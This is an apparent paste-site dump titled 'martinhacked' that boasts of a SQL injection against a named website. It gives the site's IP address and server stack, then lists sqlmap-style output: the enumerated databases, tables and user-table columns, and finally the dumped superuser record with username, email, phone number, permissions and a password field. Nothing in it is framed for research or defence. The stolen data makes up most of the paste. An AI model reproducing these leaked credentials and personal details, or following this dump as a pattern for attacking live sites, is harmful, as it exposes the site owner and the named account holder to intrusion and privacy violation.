SHARE
TWEET

martinhacked

a guest Feb 6th, 2015 1,621 Never
  1. Target: http://martin-schulz.info/
  2. Vulnerability type: Sql injection
  3. Ip:80.83.122.216
  4. web application technology: Apache, PHP 5.2.17
  5. back-end DBMS: MySQL 5.0
  6. banner:    '5.1.73'
  7.  
  8. screenshots http://prntscr.com/61uc1l   http://prntscr.com/61uci1
  9.  
  10.  
  11. available databases [2]:
  12. [*] information_schema
  13. [*] usrdb_martiib9_v7redsys
  14.  
  15. Database: usrdb_martiib9_v7redsys
  16. [11 tables]
  17. +-----------------+
  18. | aktuelles       |
  19. | blog            |
  20. | cms_navigation  |
  21. | cms_page        |
  22. | mediathek       |
  23. | presse          |
  24. | quiz            |
  25. | quiz_teilnehmer |
  26. | termine         |
  27. | umfrage         |
  28. | userbw          |
  29. +-----------------+
  30. Database: usrdb_martiib9_v7redsys
  31. Table: userbw
  32. [14 columns]
  33. +----------------+--------------+
  34. | Column         | Type         |
  35. +----------------+--------------+
  36. | aktiv          | varchar(4)   |
  37. | anrede         | varchar(4)   |
  38. | benutzername   | varchar(50)  |
  39. | berechtigungen | text         |
  40. | bilder         | longtext     |
  41. | email          | varchar(100) |
  42. | entwurf        | varchar(4)   |
  43. | id             | int(11)      |
  44. | last_login     | datetime     |
  45. | nachname       | varchar(50)  |
  46. | passwort       | varchar(50)  |
  47. | telefon        | varchar(30)  |
  48. | titel          | varchar(20)  |
  49. | vorname        | varchar(50)  |
  50.  
  51. [11:40:34] [INFO] fetching entries for table 'userbw' in database 'usrdb_martiib
  52. 9_v7redsys'
  53. [11:40:34] [INFO] the SQL query used returns 1 entries
  54. [11:40:35] [INFO] retrieved: ja
  55. [11:40:36] [INFO] retrieved: Herr
  56. [11:40:37] [INFO] retrieved: nagkEeegjfwsnAxfEreqyupq
  57. [11:40:41] [INFO] retrieved: a:9:{s:9:"aktuelles";b:1;s:7:"termine";b:1;s:6:"pre
  58. sse";b:1;s:7:"umfrage";b:1;s:4:"quiz";b:1;s:4:"blog";b:1;s:9:"mediathek";b:1;s:3
  59. :"cms";b:1;s:4:"user";b:1;}
  60. [11:40:43] [INFO] retrieved: a:1:{i:0;a:7:{i:0;s:10:"1229684947";i:1;s:3:"394";i
  61. :2;s:3:"209";i:3;s:9:"dummy.jpg";i:4;s:2:"15";i:5;s:5:"26 KB";i:6;s:3:"jpg";}}
  62. [11:40:45] [INFO] retrieved: info@visualseven.de
  63. [11:40:45] [INFO] retrieved:
  64. [11:40:46] [INFO] retrieved: 1
  65.  
  66.  
  67. Database: usrdb_martiib9_v7redsys
  68. Table: userbw
  69. [1 entry]
  70.  
  71. id,titel,aktiv,email,bilder,anrede,entwurf,vorname,telefon,passwort,nachname,last_login,benutzername,berechtigungen
  72. 1,Superuser,ja,info@visualseven.de,"a:1:{1229684947"";i:1;s:3:""394"";i:2;s:3:""209"";i:3;s:9i:0;a:7:{i:0;s:10:"":""dummy.jpg"";i:4;s:2:""15"";i:5;s:5:""26 KB"";i:6;s:3:""jpg"";}}",Herr,<blank>,<blank>,(0 24 03) 5 01 79 -0,¼.@ë»<ÿ©\x17\x1a\x17\x9bø×\x98 í\x84!Ø\x84I`\x84,<blank>,2015-02-06 08:59:49,nagkEeegjfwsnAxfEreqyupq,"a:9:{s:9:""aktuelles"";b:1;s:7:""termine"";b:1;s:6:""presse"";b:1;s:7:""umfrage"";b:1;s:4:""quiz"";b:1;s:4:""blog"";b:1;s:9:""mediathek"";b:1;s:3:""cms"";b:1;s:4:""user"";b:1;}"
  73.  
  74. database management system users [1]:
  75. [*] 'martiib9'@'localhost'
RAW Paste Data
Top